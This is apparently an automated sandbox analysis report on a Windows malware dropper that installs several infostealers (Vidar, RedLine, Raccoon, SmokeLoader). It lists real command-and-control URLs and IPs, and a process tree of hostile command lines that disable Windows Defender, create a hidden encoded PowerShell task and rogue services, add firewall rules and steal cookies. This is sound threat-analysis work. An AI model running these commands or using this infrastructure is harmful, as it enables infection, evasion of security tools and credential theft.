Analysis

  • max time kernel
    33s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    11-03-2022 23:20

General

  • Target

    ae8cf68c0b8316c637e3dd27b1f07938ecba84186c0b2f26e87a833c59a36255.exe

  • Size

    3.1MB

  • MD5

    4a0f23f47eb88b0a4e678767d7683864

  • SHA1

    c52c29be32be4fb925411163769eef241241c5f2

  • SHA256

    ae8cf68c0b8316c637e3dd27b1f07938ecba84186c0b2f26e87a833c59a36255

  • SHA512

    7fa020b866fddffd092eeab3e7399e4c8969a815cd856fca3a061d44347a1636956c8075e5bf1a939485d89f8b2f3bceeb999033c95fe3ee6eec633648bfb8e6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

5e952d9d2bbe82643afb1857a7befd7377f3a063

Attributes
  • url4cnc

    http://185.3.95.153/sbjoahera

    http://185.163.204.22/sbjoahera

    https://t.me/sbjoahera

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 15 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae8cf68c0b8316c637e3dd27b1f07938ecba84186c0b2f26e87a833c59a36255.exe
    "C:\Users\Admin\AppData\Local\Temp\ae8cf68c0b8316c637e3dd27b1f07938ecba84186c0b2f26e87a833c59a36255.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:540
    • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC127940D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4124
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_7.exe
          sonia_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_7.exe
            5⤵
            • Executes dropped EXE
            PID:3304
          • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3576
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_6.exe
          sonia_6.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:1332
          • C:\Users\Admin\Documents\wyBjUeBj4Se31UIy0fjPjilj.exe
            "C:\Users\Admin\Documents\wyBjUeBj4Se31UIy0fjPjilj.exe"
            5⤵
            • Executes dropped EXE
            PID:4952
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 924
              6⤵
              • Program crash
              PID:2876
          • C:\Users\Admin\Documents\gim7NYYVnfWJbvT4z_XooBIH.exe
            "C:\Users\Admin\Documents\gim7NYYVnfWJbvT4z_XooBIH.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:1196
          • C:\Users\Admin\Documents\wLTQXln2TsDagk6ONxv99YOv.exe
            "C:\Users\Admin\Documents\wLTQXln2TsDagk6ONxv99YOv.exe"
            5⤵
            • Executes dropped EXE
            PID:2568
          • C:\Users\Admin\Documents\I3dGO9n8EAuimFJ2wABz68DJ.exe
            "C:\Users\Admin\Documents\I3dGO9n8EAuimFJ2wABz68DJ.exe"
            5⤵
              PID:4536
              • C:\Users\Admin\AppData\Local\Temp\0368baaa-89ac-4075-a48b-8213e2e0f290.exe
                "C:\Users\Admin\AppData\Local\Temp\0368baaa-89ac-4075-a48b-8213e2e0f290.exe"
                6⤵
                  PID:5192
              • C:\Users\Admin\Documents\IUApBmoHkoxO92OnMaZo9ZYy.exe
                "C:\Users\Admin\Documents\IUApBmoHkoxO92OnMaZo9ZYy.exe"
                5⤵
                  PID:3568
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                    6⤵
                      PID:5848
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 600
                      6⤵
                      • Program crash
                      PID:1280
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 968
                      6⤵
                      • Program crash
                      PID:5748
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 968
                      6⤵
                      • Program crash
                      PID:5548
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                      6⤵
                        PID:216
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 1020
                        6⤵
                        • Program crash
                        PID:680
                    • C:\Users\Admin\Documents\1km2uN95Jb1omTxFRI2wIECL.exe
                      "C:\Users\Admin\Documents\1km2uN95Jb1omTxFRI2wIECL.exe"
                      5⤵
                        PID:3324
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bccsqwyv\
                          6⤵
                            PID:5840
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vfsakeij.exe" C:\Windows\SysWOW64\bccsqwyv\
                            6⤵
                              PID:6052
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" start bccsqwyv
                              6⤵
                                PID:5564
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" description bccsqwyv "wifi internet conection"
                                6⤵
                                  PID:4528
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" create bccsqwyv binPath= "C:\Windows\SysWOW64\bccsqwyv\vfsakeij.exe /d\"C:\Users\Admin\Documents\1km2uN95Jb1omTxFRI2wIECL.exe\"" type= own start= auto DisplayName= "wifi support"
                                  6⤵
                                    PID:2776
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                    6⤵
                                      PID:2772
                                    • C:\Users\Admin\vrtyzfal.exe
                                      "C:\Users\Admin\vrtyzfal.exe" /d"C:\Users\Admin\Documents\1km2uN95Jb1omTxFRI2wIECL.exe"
                                      6⤵
                                        PID:5380
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ouckpxmb.exe" C:\Windows\SysWOW64\bccsqwyv\
                                          7⤵
                                            PID:3820
                                          • C:\Windows\SysWOW64\sc.exe
                                            "C:\Windows\System32\sc.exe" config bccsqwyv binPath= "C:\Windows\SysWOW64\bccsqwyv\ouckpxmb.exe /d\"C:\Users\Admin\vrtyzfal.exe\""
                                            7⤵
                                              PID:5544
                                            • C:\Windows\SysWOW64\sc.exe
                                              "C:\Windows\System32\sc.exe" start bccsqwyv
                                              7⤵
                                                PID:2836
                                              • C:\Windows\SysWOW64\netsh.exe
                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                7⤵
                                                  PID:3572
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7437.bat" "
                                                  7⤵
                                                    PID:4320
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1232
                                                    7⤵
                                                    • Program crash
                                                    PID:1168
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 1284
                                                  6⤵
                                                  • Program crash
                                                  PID:5784
                                              • C:\Users\Admin\Documents\jJP1KLY7zPBEZK4TaHJyuHIA.exe
                                                "C:\Users\Admin\Documents\jJP1KLY7zPBEZK4TaHJyuHIA.exe"
                                                5⤵
                                                  PID:4236
                                                  • C:\Users\Admin\AppData\Local\Temp\L3CB0.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\L3CB0.exe"
                                                    6⤵
                                                      PID:5532
                                                    • C:\Users\Admin\AppData\Local\Temp\2003I.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\2003I.exe"
                                                      6⤵
                                                        PID:5736
                                                      • C:\Users\Admin\AppData\Local\Temp\2003I.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\2003I.exe"
                                                        6⤵
                                                          PID:5672
                                                        • C:\Users\Admin\AppData\Local\Temp\C33E0.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\C33E0.exe"
                                                          6⤵
                                                            PID:5876
                                                          • C:\Users\Admin\AppData\Local\Temp\6LCIC.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\6LCIC.exe"
                                                            6⤵
                                                              PID:6064
                                                            • C:\Users\Admin\AppData\Local\Temp\G1E6H.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\G1E6H.exe"
                                                              6⤵
                                                                PID:5136
                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                  "C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
                                                                  7⤵
                                                                    PID:6112
                                                                • C:\Users\Admin\AppData\Local\Temp\AJHH7H75912HLBC.exe
                                                                  https://iplogger.org/1nChi7
                                                                  6⤵
                                                                    PID:3900
                                                                • C:\Users\Admin\Documents\kyV7lYCARucZmWwCMBMbNOta.exe
                                                                  "C:\Users\Admin\Documents\kyV7lYCARucZmWwCMBMbNOta.exe"
                                                                  5⤵
                                                                    PID:1076
                                                                    • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                                                                      6⤵
                                                                        PID:4976
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        6⤵
                                                                          PID:3272
                                                                      • C:\Users\Admin\Documents\MQnIFLK5i2aNRzGGfcD8tgaJ.exe
                                                                        "C:\Users\Admin\Documents\MQnIFLK5i2aNRzGGfcD8tgaJ.exe"
                                                                        5⤵
                                                                          PID:4316
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                                            6⤵
                                                                              PID:4564
                                                                              • C:\Windows\system32\mode.com
                                                                                mode 65,10
                                                                                7⤵
                                                                                  PID:5200
                                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                  7z.exe e file.zip -p320791618516055 -oextracted
                                                                                  7⤵
                                                                                    PID:4592
                                                                              • C:\Users\Admin\Documents\6heFBIzNptsXZs9mpMYlFHfL.exe
                                                                                "C:\Users\Admin\Documents\6heFBIzNptsXZs9mpMYlFHfL.exe"
                                                                                5⤵
                                                                                  PID:208
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 640
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:6020
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 764
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:5716
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 840
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:6084
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1276
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:5264
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1284
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4332
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "6heFBIzNptsXZs9mpMYlFHfL.exe" /f & erase "C:\Users\Admin\Documents\6heFBIzNptsXZs9mpMYlFHfL.exe" & exit
                                                                                    6⤵
                                                                                      PID:5660
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im "6heFBIzNptsXZs9mpMYlFHfL.exe" /f
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5540
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1372
                                                                                      6⤵
                                                                                      • Program crash
                                                                                      PID:5164
                                                                                  • C:\Users\Admin\Documents\xzIwFZD81G7jLyaH_q43t5vC.exe
                                                                                    "C:\Users\Admin\Documents\xzIwFZD81G7jLyaH_q43t5vC.exe"
                                                                                    5⤵
                                                                                      PID:224
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 440
                                                                                        6⤵
                                                                                        • Program crash
                                                                                        PID:5684
                                                                                    • C:\Users\Admin\Documents\qwZ6Y8XtHvo1UZympI6_8CXF.exe
                                                                                      "C:\Users\Admin\Documents\qwZ6Y8XtHvo1UZympI6_8CXF.exe"
                                                                                      5⤵
                                                                                        PID:220
                                                                                      • C:\Users\Admin\Documents\UivrYDwv3PeqtPGOJ7N6yBpQ.exe
                                                                                        "C:\Users\Admin\Documents\UivrYDwv3PeqtPGOJ7N6yBpQ.exe"
                                                                                        5⤵
                                                                                          PID:1544
                                                                                        • C:\Users\Admin\Documents\WQJyOalPq_UHSkf4X5jcUh7X.exe
                                                                                          "C:\Users\Admin\Documents\WQJyOalPq_UHSkf4X5jcUh7X.exe"
                                                                                          5⤵
                                                                                            PID:4588
                                                                                          • C:\Users\Admin\Documents\RSLGzxCKMZRpXAL3Kja3CKWT.exe
                                                                                            "C:\Users\Admin\Documents\RSLGzxCKMZRpXAL3Kja3CKWT.exe"
                                                                                            5⤵
                                                                                              PID:1464
                                                                                            • C:\Users\Admin\Documents\KQPThKcaBMiY7_ULPkCep_0H.exe
                                                                                              "C:\Users\Admin\Documents\KQPThKcaBMiY7_ULPkCep_0H.exe"
                                                                                              5⤵
                                                                                                PID:4348
                                                                                              • C:\Users\Admin\Documents\xSYBwUa6NJdKDtks1FR9aORL.exe
                                                                                                "C:\Users\Admin\Documents\xSYBwUa6NJdKDtks1FR9aORL.exe"
                                                                                                5⤵
                                                                                                  PID:3680
                                                                                                • C:\Users\Admin\Documents\Sf7_3TdAeIC3FgdSgJ7mfA3R.exe
                                                                                                  "C:\Users\Admin\Documents\Sf7_3TdAeIC3FgdSgJ7mfA3R.exe"
                                                                                                  5⤵
                                                                                                    PID:3560
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im Sf7_3TdAeIC3FgdSgJ7mfA3R.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Sf7_3TdAeIC3FgdSgJ7mfA3R.exe" & del C:\ProgramData\*.dll & exit
                                                                                                      6⤵
                                                                                                        PID:3464
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /im Sf7_3TdAeIC3FgdSgJ7mfA3R.exe /f
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:5688
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 6
                                                                                                          7⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2620
                                                                                                    • C:\Users\Admin\Documents\wjNQELIHRBLy1NHjoO8JnEMQ.exe
                                                                                                      "C:\Users\Admin\Documents\wjNQELIHRBLy1NHjoO8JnEMQ.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:700
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3740
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_5.exe
                                                                                                    sonia_5.exe
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4904
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:5024
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_4.exe
                                                                                                    sonia_4.exe
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1736
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3680
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:1316
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4724
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_3.exe
                                                                                                    sonia_3.exe
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    PID:2980
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 1064
                                                                                                      5⤵
                                                                                                      • Program crash
                                                                                                      PID:848
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1952
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_2.exe
                                                                                                    sonia_2.exe
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:4896
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1672
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_1.exe
                                                                                                    sonia_1.exe
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1464
                                                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
                                                                                                      5⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:3580
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 600
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:3276
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC3F9.tmp\Install.exe
                                                                                                      .\Install.exe
                                                                                                      5⤵
                                                                                                        PID:4356
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSD8E9.tmp\Install.exe
                                                                                                          .\Install.exe /S /site_id "525403"
                                                                                                          6⤵
                                                                                                            PID:4504
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                              7⤵
                                                                                                                PID:1428
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                  8⤵
                                                                                                                    PID:504
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                      9⤵
                                                                                                                        PID:2284
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                        9⤵
                                                                                                                          PID:3040
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                      7⤵
                                                                                                                        PID:448
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                          8⤵
                                                                                                                            PID:3736
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                              9⤵
                                                                                                                                PID:424
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                9⤵
                                                                                                                                  PID:2108
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /CREATE /TN "gLTqTLhrw" /SC once /ST 00:17:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                              7⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:5452
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /run /I /tn "gLTqTLhrw"
                                                                                                                              7⤵
                                                                                                                                PID:2724
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 540
                                                                                                                        3⤵
                                                                                                                        • Program crash
                                                                                                                        PID:2848
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4124 -ip 4124
                                                                                                                    1⤵
                                                                                                                      PID:1912
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3580 -ip 3580
                                                                                                                      1⤵
                                                                                                                        PID:208
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 624
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5224
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2980 -ip 2980
                                                                                                                        1⤵
                                                                                                                          PID:620
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                          1⤵
                                                                                                                            PID:5060
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd
                                                                                                                              2⤵
                                                                                                                                PID:5184
